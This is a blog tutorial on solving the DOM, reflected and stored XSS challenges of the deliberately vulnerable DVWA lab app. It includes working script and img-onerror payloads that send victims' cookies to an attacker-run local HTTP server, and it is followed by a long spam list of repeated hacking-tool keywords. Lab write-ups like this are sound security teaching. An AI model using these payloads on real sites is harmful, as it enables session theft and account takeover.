Monday 24 August 2020

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script>
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script>
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

Read more


  1. Nsa Hack Tools
  2. Hacking Tools Github
  3. Pentest Tools Github
  4. Hack Tools For Games
  5. Hack Tools For Mac
  6. Hacker Search Tools
  7. Hack Tools For Games
  8. Pentest Tools Subdomain
  9. Hacker Tools For Pc
  10. Hacker Security Tools
  11. How To Hack
  12. Pentest Tools For Android
  13. Hacking Tools 2019
  14. Nsa Hack Tools Download
  15. Pentest Automation Tools
  16. Hackers Toolbox
  17. Hacking Apps
  18. Hacker Tools 2020
  19. Hacking Tools And Software
  20. Termux Hacking Tools 2019
  21. Hacker Tools
  22. Pentest Tools Website
  23. Tools 4 Hack
  24. Hack Tools Mac
  25. Hacker Tools Mac
  26. Hacking Tools For Games
  27. Wifi Hacker Tools For Windows
  28. Hack Tools
  29. Pentest Tools Website Vulnerability
  30. Hack Tools Github
  31. Hacker
  32. Hacking Tools
  33. Pentest Automation Tools
  34. Pentest Tools Nmap
  35. Pentest Box Tools Download
  36. Hacking Tools Pc
  37. Hacking Tools Pc
  38. How To Make Hacking Tools
  39. Hacker Tools Windows
  40. Hack Tool Apk No Root
  41. Hacker Tools Mac
  42. Pentest Recon Tools
  43. Hacking Tools
  44. How To Install Pentest Tools In Ubuntu
  45. Hack Tools For Pc
  46. Nsa Hack Tools Download
  47. Nsa Hack Tools
  48. Hacking Tools For Kali Linux
  49. Pentest Tools Find Subdomains
  50. Ethical Hacker Tools
  51. Game Hacking
  52. Pentest Tools Website
  53. Pentest Tools Android
  54. Hacking Tools Online
  55. Hacker Tools Free
  56. Hacking Tools Windows 10
  57. Pentest Tools Android
  58. Hacking Tools For Pc
  59. Beginner Hacker Tools
  60. Nsa Hacker Tools
  61. Hacking Tools Kit
  62. Hacking Tools Pc
  63. Tools For Hacker
  64. Hacker Tools Apk
  65. Hacking Tools For Games
  66. Hacker Tools Software
  67. Hacker Tools 2020
  68. Hacker Tools Free Download
  69. Hacker Tools Windows
  70. Tools Used For Hacking
  71. Pentest Tools For Windows
  72. Hacker Tools Free
  73. Pentest Tools Free
  74. Hack Tools 2019
  75. Pentest Tools Github
  76. Pentest Tools Framework
  77. Pentest Tools Tcp Port Scanner
  78. Hack Rom Tools
  79. Hacking Tools Hardware
  80. Hak5 Tools
  81. Pentest Tools Linux
  82. Hack Tools Pc
  83. Hacker Search Tools
  84. Github Hacking Tools
  85. Hacking Tools Windows 10
  86. Hacker
  87. Termux Hacking Tools 2019
  88. What Are Hacking Tools
  89. Pentest Recon Tools
  90. Hacker Tools Apk Download
  91. Top Pentest Tools
  92. Hacking App
  93. Pentest Tools Tcp Port Scanner
  94. Wifi Hacker Tools For Windows
  95. Hacking Tools Online
  96. Nsa Hacker Tools
  97. Physical Pentest Tools
  98. Hacker Tools For Mac
  99. Hacker Tools Windows
  100. Hacker Hardware Tools
  101. Hacking Tools For Mac
  102. Hacker Security Tools
  103. Hacks And Tools
  104. Hacker Tools For Mac
  105. Tools Used For Hacking
  106. Pentest Tools Alternative
  107. Hack Tools 2019
  108. Hack And Tools
  109. Hack Tool Apk
  110. Hacker Techniques Tools And Incident Handling
  111. Hacker Tools For Pc
  112. Pentest Tools Bluekeep
  113. Best Hacking Tools 2019
  114. Hackers Toolbox
  115. Blackhat Hacker Tools
  116. Bluetooth Hacking Tools Kali
  117. Free Pentest Tools For Windows
  118. Hacker Tools Linux
  119. Hacker Tools Linux
  120. Pentest Tools Windows
  121. Hacker Security Tools
  122. Underground Hacker Sites
  123. Hack App
  124. Hack Tools Download
  125. Hacker Security Tools
  126. Hacking App
  127. New Hacker Tools
  128. Hackers Toolbox
  129. Install Pentest Tools Ubuntu
  130. Hack Tools For Games
  131. Hack Tools For Mac
  132. Hacking Tools For Pc
  133. Hacking Tools Free Download
  134. Hacking Tools Windows
  135. Easy Hack Tools
  136. Pentest Tools List
  137. Hacker Tools Free Download
  138. Hacking Tools For Windows
  139. Hacker Tools Apk
  140. Hacker Tools Apk Download
  141. Hack Tools Pc
  142. Pentest Box Tools Download
  143. Hacking Tools For Beginners
  144. Hacking Apps
  145. Pentest Tools List
  146. Pentest Tools Website Vulnerability
  147. Pentest Tools Android
  148. How To Make Hacking Tools
  149. Pentest Tools Apk
  150. Pentest Recon Tools
  151. Hack App
  152. Hacking Tools For Windows Free Download
  153. Hacking Tools Usb
  154. Hacking Tools Online
  155. Hacker Tools 2020
  156. Hacking Tools For Kali Linux
  157. Hacker Tools List
  158. Hak5 Tools
  159. Kik Hack Tools
  160. How To Hack
  161. Hacking Tools Usb
  162. Hacking Tools Download
  163. Hack Tools Download
  164. Pentest Tools Bluekeep
  165. Hacking Tools Name
  166. Black Hat Hacker Tools
  167. Pentest Tools

No comments:

Post a Comment